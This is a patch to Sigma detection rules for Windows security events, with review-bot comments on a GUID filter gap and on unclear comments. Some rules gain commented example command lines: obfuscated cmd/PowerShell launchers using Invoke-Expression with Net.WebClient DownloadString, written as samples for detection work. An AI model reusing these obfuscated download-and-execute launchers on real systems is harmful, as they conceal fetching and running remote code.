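Review bot: The new comment on `filter_main_guid` says these subcategories are filtered because rule ab4561b1 covers them, but for `{0CCE9217-…}` (Audit Account Lockout) that is only half true: the sibling rule matches Account Lockout only with `%%8448` (Success removed), while this rule filters the GUID for both `%%8448` and `%%8450`, so a 4719 that removes Failure auditing from Account Lockout is dropped by both rules. Unless leaving that case uncovered is deliberate, either remove `{0CCE9217-69AE-11D9-BED3-505054503030}` from this list or move it into its own filter that only excludes the Success-removed case, e.g. `filter_main_lockout:` / `SubcategoryGuid: '{0CCE9217-69AE-11D9-BED3-505054503030}'` / `AuditPolicyChanges|contains: '%%8448'`, which the existing `not 1 of filter_main_*` condition already picks up. The last comment in the list also carries a stray trailing quote (`# Audit Kerberos Authentication Service'`); harmless inside a comment, but worth dropping.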
@@ -25,26 +24,27 @@ detection: selection_state_success_and_failure: EventID: 4719 SubcategoryGuid: - - '{0CCE9210-69AE-11D9-BED3-505054503030}' - - '{0CCE9211-69AE-11D9-BED3-505054503030}' - - '{0CCE9212-69AE-11D9-BED3-505054503030}' - - '{0CCE9215-69AE-11D9-BED3-505054503030}' - - '{0CCE921B-69AE-11D9-BED3-505054503030}' - - '{0CCE922B-69AE-11D9-BED3-505054503030}' - - '{0CCE922F-69AE-11D9-BED3-505054503030}' - - '{0CCE9230-69AE-11D9-BED3-505054503030}' - - '{0CCE9235-69AE-11D9-BED3-505054503030}' - - '{0CCE9236-69AE-11D9-BED3-505054503030}' - - '{0CCE9237-69AE-11D9-BED3-505054503030}' - - '{0CCE923F-69AE-11D9-BED3-505054503030}' - - '{0CCE9240-69AE-11D9-BED3-505054503030}' - - '{0CCE9242-69AE-11D9-BED3-505054503030}' + # Note: Add or remove GUID as you see fit in your env + - '{0CCE9210-69AE-11D9-BED3-505054503030}' # Audit Security State Change + - '{0CCE9211-69AE-11D9-BED3-505054503030}' # Audit Security System Extension + - '{0CCE9212-69AE-11D9-BED3-505054503030}' # Audit System Integrity + - '{0CCE9215-69AE-11D9-BED3-505054503030}' # Audit Logon + - '{0CCE921B-69AE-11D9-BED3-505054503030}' # Audit Special Logon + - '{0CCE922B-69AE-11D9-BED3-505054503030}' # Audit Process Creation + - '{0CCE922F-69AE-11D9-BED3-505054503030}' # Audit Audit Policy Change + - '{0CCE9230-69AE-11D9-BED3-505054503030}' # Audit Authentication Policy Change + - '{0CCE9235-69AE-11D9-BED3-505054503030}' # Audit User Account Management + - '{0CCE9236-69AE-11D9-BED3-505054503030}' # Audit Computer Account Management + - '{0CCE9237-69AE-11D9-BED3-505054503030}' # Audit Security Group Management + - '{0CCE923F-69AE-11D9-BED3-505054503030}' # Audit Credential Validation + - '{0CCE9240-69AE-11D9-BED3-505054503030}' # Audit Kerberos Service Ticket Operations + - '{0CCE9242-69AE-11D9-BED3-505054503030}' # Audit Kerberos Authentication Service AuditPolicyChanges|contains: - - '%%8448' - - '%%8450' + - '%%8448' # This is "Success removed" + - '%%8450' # This is "Failure removed" 
selection_state_success_only: EventID: 4719 - SubcategoryGuid: '{0CCE9217-69AE-11D9-BED3-505054503030}' + SubcategoryGuid: '{0CCE9217-69AE-11D9-BED3-505054503030}' # Audit Account Lockout AuditPolicyChanges|contains: '%%8448' condition: security and (1 of selection_*) falsepositives: diff --git a/sigma/builtin/security/win_security_dot_net_etw_tamper.yml b/sigma/builtin/security/win_security_dot_net_etw_tamper.yml index fdd3790a6..4710c882e 100644 --- a/sigma/builtin/security/win_security_dot_net_etw_tamper.yml +++ b/sigma/builtin/security/win_security_dot_net_etw_tamper.yml @@ -1,8 +1,8 @@ title: ETW Logging Disabled In .NET Processes - Registry id: a4c90ea1-2634-4ca0-adbb-35eae169b6fc related: - - id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544 - type: similar + - id: bf4fc428-dcc3-4bbd-99fe-2422aeee2544 + type: similar status: test description: Potential adversaries stopping ETW providers recording loaded .NET assemblies. references: diff --git a/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml b/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml index 5ae2ab9b4..f217c4249 100644 --- a/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml +++ b/sigma/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml @@ -1,8 +1,7 @@ title: DPAPI Domain Backup Key Extraction id: 4ac1f50b-3bd0-4968-902d-868b4647937e status: test -description: Detects tools extracting LSA secret DPAPI domain backup key from Domain - Controllers +description: Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers references: - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html author: Roberto Rodriguez @Cyb3rWard0g diff --git a/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml b/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml index a8a5cbed5..68c9cfba6 100644 
--- a/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml +++ b/sigma/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml @@ -1,8 +1,7 @@ title: DPAPI Domain Master Key Backup Attempt id: 39a94fd1-8c9a-4ff6-bf22-c058762f8014 status: test -description: Detects anyone attempting a backup for the DPAPI Master Key. This events - gets generated at the source and not the Domain Controller. +description: Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller. references: - https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html author: Roberto Rodriguez @Cyb3rWard0g @@ -25,7 +24,6 @@ fields: - SubjectDomainName - SubjectUserName falsepositives: - - If a computer is a member of a domain, DPAPI has a backup mechanism to allow - unprotection of the data. Which will trigger this event. + - If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event. level: medium ruletype: Sigma diff --git a/sigma/builtin/security/win_security_external_device.yml b/sigma/builtin/security/win_security_external_device.yml index 52dc0fcc2..6f52cdab3 100644 --- a/sigma/builtin/security/win_security_external_device.yml +++ b/sigma/builtin/security/win_security_external_device.yml @@ -1,8 +1,7 @@ title: External Disk Drive Or USB Storage Device id: f69a87ea-955e-4fb4-adb2-bb9fd6685632 status: test -description: Detects external diskdrives or plugged in USB devices, EventID 6416 on - Windows 10 or later +description: Detects external diskdrives or plugged in USB devices, EventID 6416 on Windows 10 or later author: Keith Wright date: 2019/11/20 modified: 2022/10/09 diff --git a/sigma/builtin/security/win_security_gpo_scheduledtasks.yml b/sigma/builtin/security/win_security_gpo_scheduledtasks.yml index 842260991..453a60fea 100644 
--- a/sigma/builtin/security/win_security_gpo_scheduledtasks.yml +++ b/sigma/builtin/security/win_security_gpo_scheduledtasks.yml @@ -1,8 +1,7 @@ title: Persistence and Execution at Scale via GPO Scheduled Task id: a8f29a7b-b137-4446-80a0-b804272f3da2 status: test -description: Detect lateral movement using GPO scheduled task, usually used to deploy - ransomware at scale +description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale references: - https://twitter.com/menasec1/status/1106899890377052160 - https://www.secureworks.com/blog/ransomware-as-a-distraction @@ -16,21 +15,19 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\SYSVOL + ShareName: \\\\\*\\SYSVOL # looking for the string \\*\SYSVOL RelativeTargetName|endswith: ScheduledTasks.xml Accesses|contains: - WriteData - '%%4417' condition: security and selection falsepositives: - - If the source IP is not localhost then it's super suspicious, better to monitor - both local and remote changes to GPO scheduledtasks + - If the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks level: high ruletype: Sigma diff --git a/sigma/builtin/security/win_security_hidden_user_creation.yml b/sigma/builtin/security/win_security_hidden_user_creation.yml index dafa3ae81..eda0faa7b 100644 --- a/sigma/builtin/security/win_security_hidden_user_creation.yml +++ b/sigma/builtin/security/win_security_hidden_user_creation.yml 
@@ -1,8 +1,7 @@ title: Hidden Local User Creation id: 7b449a5e-1db5-4dd0-a2dc-4e3a67282538 status: test -description: Detects the creation of a local hidden user account which should not - happen for event ID 4720. +description: Detects the creation of a local hidden user account which should not happen for event ID 4720. references: - https://twitter.com/SBousseaden/status/1387743867663958021 author: Christian Burkard (Nextron Systems) diff --git a/sigma/builtin/security/win_security_hktl_nofilter.yml b/sigma/builtin/security/win_security_hktl_nofilter.yml index aac99188e..6ce963cbf 100644 --- a/sigma/builtin/security/win_security_hktl_nofilter.yml +++ b/sigma/builtin/security/win_security_hktl_nofilter.yml @@ -1,10 +1,8 @@ title: HackTool - NoFilter Execution id: 7b14c76a-c602-4ae6-9717-eff868153fc0 status: experimental -description: 'Detects execution of NoFilter, a tool for abusing the Windows Filtering - Platform for privilege escalation via hardcoded policy name indicators - - ' +description: | + Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators references: - https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp - https://github.com/deepinstinct/NoFilter @@ -19,8 +17,7 @@ tags: logsource: product: windows service: security - definition: 'Requirements: Audit Filtering Platform Policy Change needs to be - enabled' + definition: 'Requirements: Audit Filtering Platform Policy Change needs to be enabled' detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml b/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml index e958f168e..6dd1271d8 100644 --- a/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml +++ b/sigma/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml 
@@ -13,8 +13,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_impacket_psexec.yml b/sigma/builtin/security/win_security_impacket_psexec.yml index f90317b74..6a0ff5225 100644 --- a/sigma/builtin/security/win_security_impacket_psexec.yml +++ b/sigma/builtin/security/win_security_impacket_psexec.yml @@ -13,14 +13,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection1: EventID: 5145 - ShareName: \\\\\*\\IPC$ + ShareName: \\\\\*\\IPC$ # looking for the string \\*\IPC$ RelativeTargetName|contains: - RemCom_stdin - RemCom_stdout diff --git a/sigma/builtin/security/win_security_impacket_secretdump.yml b/sigma/builtin/security/win_security_impacket_secretdump.yml index e26386c7f..cf0a89a64 100644 --- a/sigma/builtin/security/win_security_impacket_secretdump.yml +++ b/sigma/builtin/security/win_security_impacket_secretdump.yml @@ -15,14 +15,13 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Detailed - File Share" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure detection: security: Channel: Security selection: EventID: 5145 - ShareName: \\\\\*\\ADMIN$ + ShareName: \\\\\*\\ADMIN$ # looking for the string \\*\ADMIN$ RelativeTargetName|contains|all: - SYSTEM32\ - .tmp 
diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml index 21748a98c..27b6b2603 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_clip_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation CLIP+ Launcher - Security id: 4edf51e1-cb83-4e1a-bc39-800e396068e3 related: - - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 - type: derived + - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of Clip.exe to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 26) author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2022/11/27 @@ -15,11 +15,11 @@ tags: - attack.t1027 - attack.execution - attack.t1059.001 + logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml index 5418eab21..fe824b65d 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_obfuscated_iex_services_security.yml 
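Review bot: The `# (Task 26)` comment added next to the reference URL explains nothing to someone reading the rule; if it refers to the oscd.community task that produced the rule (the author line suggests that), spell it out as `# oscd.community task 26`, otherwise drop it. The blank line inserted before `logsource:` is fine but inconsistent with the other rules in this patch, which do not separate `tags` and `logsource`.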
@@ -1,11 +1,10 @@ title: Invoke-Obfuscation Obfuscated IEX Invocation - Security id: fd0f5778-d3cb-4c9a-9695-66759d04702a related: - - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 - type: derived + - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 + type: derived status: test -description: Detects all variations of obfuscated powershell IEX invocation code generated - by Invoke-Obfuscation framework from the code block linked in the references +description: Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block linked in the references references: - https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888 author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community 
@@ -17,21 +16,20 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection_eid: EventID: 4697 selection_servicefilename: - - ServiceFileName|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ - - ServiceFileName|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ - - ServiceFileName|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ - - ServiceFileName|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} - - ServiceFileName|re: \\*mdr\*\W\s*\)\.Name - - ServiceFileName|re: \$VerbosePreference\.ToString\( - - ServiceFileName|re: \String\]\s*\$VerbosePreference + - ServiceFileName|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[ + - ServiceFileName|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[ + - ServiceFileName|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[ + - ServiceFileName|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - ServiceFileName|re: \\*mdr\*\W\s*\)\.Name + - ServiceFileName|re: \$VerbosePreference\.ToString\( + - ServiceFileName|re: \String\]\s*\$VerbosePreference condition: security and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml index 4e0a6dd3e..d1da151de 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_stdin_services_security.yml 
@@ -1,12 +1,12 @@ title: Invoke-Obfuscation STDIN+ Launcher - Security id: 0c718a5e-4284-4fb9-b4d9-b9a50b3a1974 related: - - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 - type: derived + - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 + type: derived status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml index 03003b9a3..9657ce53b 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_var_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR+ Launcher - Security id: dcf2db1f-f091-425b-a821-c05875b8925a related: - - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 - type: derived + - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 + type: derived status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/11/29 
@@ -18,13 +18,15 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection: EventID: 4697 + # ServiceFileName|re: '.*cmd.{0,5}(?:\/c|\/r)(?:\s|)\"set\s[a-zA-Z]{3,6}.*(?:\{\d\}){1,}\\\"\s+?\-f(?:.*\)){1,}.*\"' + # Example 1: C:\winDoWs\SySTeM32\cmd.Exe /C"SET NOtI=Invoke-Expression (New-Object Net.WebClient).DownloadString&& PowERshElL -NOl SET-iteM ( 'VAR' + 'i'+ 'A' + 'blE:Ao6' + 'I0') ( [TYpe](\"{2}{3}{0}{1}\"-F 'iRoN','mENT','e','nv') ) ; ${exECUtIONCOnTEXT}.\"IN`VO`KecOmMaND\".\"inVo`KES`crIPt\"( ( ( GEt-VAriAble ( 'a' + 'o6I0') -vaLU )::(\"{1}{4}{2}{3}{0}\" -f'e','gETenvIR','NtvaRIa','BL','ONme' ).Invoke(( \"{0}{1}\"-f'n','oti' ),( \"{0}{1}\" -f'pRoC','esS') )) )" + # Example 2: cMD.exe /C "seT SlDb=Invoke-Expression (New-Object Net.WebClient).DownloadString&& pOWErShell .(( ^&(\"{1}{0}{2}{3}\" -f 'eT-vaR','G','iab','lE' ) (\"{0}{1}\" -f '*m','DR*' ) ).\"na`ME\"[3,11,2]-JOIN'' ) ( ( ^&(\"{0}{1}\" -f'g','CI' ) (\"{0}{1}\" -f 'ENV',':SlDb' ) ).\"VA`luE\" ) " ServiceFileName|contains|all: - cmd - '"set' diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml index 1eb22339a..16ac2e3b9 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_compress_services_security.yml 
@@ -1,12 +1,12 @@ title: Invoke-Obfuscation COMPRESS OBFUSCATION - Security id: 7a922f1b-2635-4d6c-91ef-af228b198ad3 related: - - id: 175997c5-803c-4b08-8bb0-70b099f47595 - type: derived + - id: 175997c5-803c-4b08-8bb0-70b099f47595 + type: derived status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml index 754c5b9f4..eeb1cc507 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_rundll_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation RUNDLL LAUNCHER - Security id: f241cf1b-3a6b-4e1a-b4f9-133c00dd95ca related: - - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 - type: derived + - id: 11b52f18-aaec-4d60-9143-5dd8cc4706b9 + type: derived status: test description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 
@@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml index edbba4618..aec0fd797 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_stdin_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Stdin - Security id: 80b708f3-d034-40e4-a6c8-d23b7a7db3d1 related: - - id: 487c7524-f892-4054-b263-8a0ace63fc25 - type: derived + - id: 487c7524-f892-4054-b263-8a0ace63fc25 + type: derived status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml index 252bacf2d..49dbacfd1 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_clip_services_security.yml 
@@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use Clip - Security id: 1a0a2ff1-611b-4dac-8216-8a7b47c618a6 related: - - id: 63e3365d-4824-42d8-8b82-e56810fefa0c - type: derived + - id: 63e3365d-4824-42d8-8b82-e56810fefa0c + type: derived status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml index 71c076220..df3d8c668 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use MSHTA - Security id: 9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a related: - - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 - type: derived + - id: 7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4 + type: derived status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 
@@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml index da1b65c9f..6fb6e0f97 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_use_rundll32_services_security.yml @@ -1,12 +1,12 @@ title: Invoke-Obfuscation Via Use Rundll32 - Security id: cd0f7229-d16f-42de-8fe3-fba365fbcb3a related: - - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b - type: derived + - id: 641a4bfb-c017-44f7-800c-2aee0184ce9b + type: derived status: test description: Detects Obfuscated Powershell via use Rundll32 in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task30) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 @@ -18,8 +18,7 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml b/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml index cec77269b..703aaa6b3 100644 --- a/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml +++ b/sigma/builtin/security/win_security_invoke_obfuscation_via_var_services_security.yml 
@@ -1,12 +1,12 @@ title: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security id: 4c54ba8f-73d2-4d40-8890-d9cf1dca3d30 related: - - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 - type: derived + - id: 14bcba49-a428-42d9-b943-e2ce0f0f7ae6 + type: derived status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/11/29 @@ -18,13 +18,15 @@ tags: logsource: product: windows service: security - definition: The 'System Security Extension' audit subcategory need to be enabled - to log the EID 4697 + definition: The 'System Security Extension' audit subcategory need to be enabled to log the EID 4697 detection: security: Channel: Security selection: EventID: 4697 + # ServiceFileName|re: '(?i).*&&set.*(\{\d\}){2,}\\\"\s+?\-f.*&&.*cmd.*\/c' # FPs with |\/r + # Example 1: CMD /C"sET KUR=Invoke-Expression (New-Object Net.WebClient).DownloadString&&Set MxI=C:\wINDowS\sYsWow64\winDOWspoWERSheLl\V1.0\PowerShelL.EXe ${ExEcut`IoN`cON`TExT}.\"invo`kEcoMm`A`ND\".( \"{2}{1}{0}\" -f 'pt','EscRi','INvOk' ).Invoke( ( .( \"{0}{1}\" -f'D','IR' ) ( \"{0}{1}\"-f'ENV:kU','R')).\"vAl`Ue\" )&& CMD /C%mXI%" + # Example 2: c:\WiNDOWS\sYSTEm32\CmD.exE /C "sEt DeJLz=Invoke-Expression (New-Object Net.WebClient).DownloadString&&set yBKM=PoWERShelL -noeX ^^^&(\"{2}{0}{1}\"-f '-ItE','m','seT') ( 'V' + 'a'+ 'RiAblE:z8J' +'U2' + 'l' ) ([TYpE]( \"{2}{3}{0}{1}\"-f 'e','NT','e','NViRONM' ) ) ; ^^^& ( ( [sTrIng]${VE`Rbo`SepReFER`Ence})[1,3] + 'X'-joIN'')( ( (.('gI') ('V' + 'a' + 'RIAbLe:z8j' + 'u2' +'l' ) ).vALUe::( \"{2}{5}{0}{1}{6}{4}{3}\" -f 'IRo','Nm','GETE','ABlE','I','nv','enTVAr').Invoke(( \"{0}{1}\"-f'd','ejLz' ),( \"{1}{2}{0}\"-f'cEss','P','RO') )) )&& c:\WiNDOWS\sYSTEm32\CmD.exE /C %ybkm%" ServiceFileName|contains|all: - '&&set' - cmd 
diff --git a/sigma/builtin/security/win_security_iso_mount.yml b/sigma/builtin/security/win_security_iso_mount.yml index 0b3b59cd2..011cfefef 100644 --- a/sigma/builtin/security/win_security_iso_mount.yml +++ b/sigma/builtin/security/win_security_iso_mount.yml @@ -16,8 +16,7 @@ tags: logsource: product: windows service: security - definition: The advanced audit policy setting "Object Access > Audit Removable - Storage" must be configured for Success/Failure + definition: The advanced audit policy setting "Object Access > Audit Removable Storage" must be configured for Success/Failure detection: security: Channel: Security diff --git a/sigma/builtin/security/win_security_lm_namedpipe.yml b/sigma/builtin/security/win_security_lm_namedpipe.yml index 536ff5caa..7a224cd03 100644 --- a/sigma/builtin/security/win_security_lm_namedpipe.yml +++ b/sigma/builtin/security/win_security_lm_namedpipe.yml @@ -1,9 +1,7 @@ title: First Time Seen Remote Named Pipe id: 52d8b0c6-53d6-439a-9e41-52ad442ad9ad status: test -description: This detection excludes known namped pipes accessible remotely and notify - on newly observed ones, may help to detect lateral movement and remote exec using - named pipes +description: This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes references: - https://twitter.com/menasec1/status/1104489274387451904 author: Samir Bousseaden 
